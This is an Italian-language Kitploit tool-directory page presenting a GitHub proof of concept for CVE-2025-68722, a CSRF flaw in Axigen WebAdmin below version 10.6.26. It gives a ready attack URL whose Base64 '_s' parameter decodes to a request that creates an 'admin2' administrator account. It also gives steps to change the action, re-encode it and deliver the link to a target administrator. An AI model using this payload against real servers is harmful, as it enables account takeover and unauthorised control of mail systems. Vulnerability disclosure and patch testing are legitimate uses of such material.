Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-68722 — Axigen WebAdmin CSRF Vulnerability | Kitploit
Strumenti/GitHubGitHub/osmancanvural/cve-2025-68722
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubosmancanvural/cve-2025-68722

CVE-2025-68722

Axigen WebAdmin CSRF Vulnerability

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68722: Axigen WebAdmin CSRF

Riepilogo della vulnerabilità

Le azioni critiche di modifica dello stato nell'interfaccia Axigen WebAdmin sono accessibili tramite richieste GET. Mentre il token _h protegge dal CSRF diretto, l'applicazione elabora le richieste in coda tramite il parametro _s (breadcrumb) immediatamente dopo l'autenticazione dell'utente.

Un attaccante può creare un URL contenente un payload codificato in Base64 nel parametro _s. Se un amministratore fa clic su questo link e completa il processo di login, l'azione in coda viene eseguita automaticamente nel suo contesto.

Versioni affette: < 10.6.26

Per maggiori informazioni, consulta la Knowledge Base di Axigen.


POC

URL di destinazione: https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19

Payload decodificato (parametro _s):

root@kitploit:~
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

Passaggi per riprodurre:

  1. Modifica: Cambia il payload JSON per indirizzare diverse azioni amministrative (ad es., modificare le impostazioni del server).
  2. Codifica: Ricodifica il JSON modificato in Base64.
  3. Consegna: Sostituisci il valore del parametro _s nell'URL dell'attacco e consegnalo a un amministratore bersaglio.
  4. Attiva: Dopo l'accesso tramite questo link, l'account admin2 viene creato (o viene eseguita la tua azione personalizzata).

Scarica lo strumento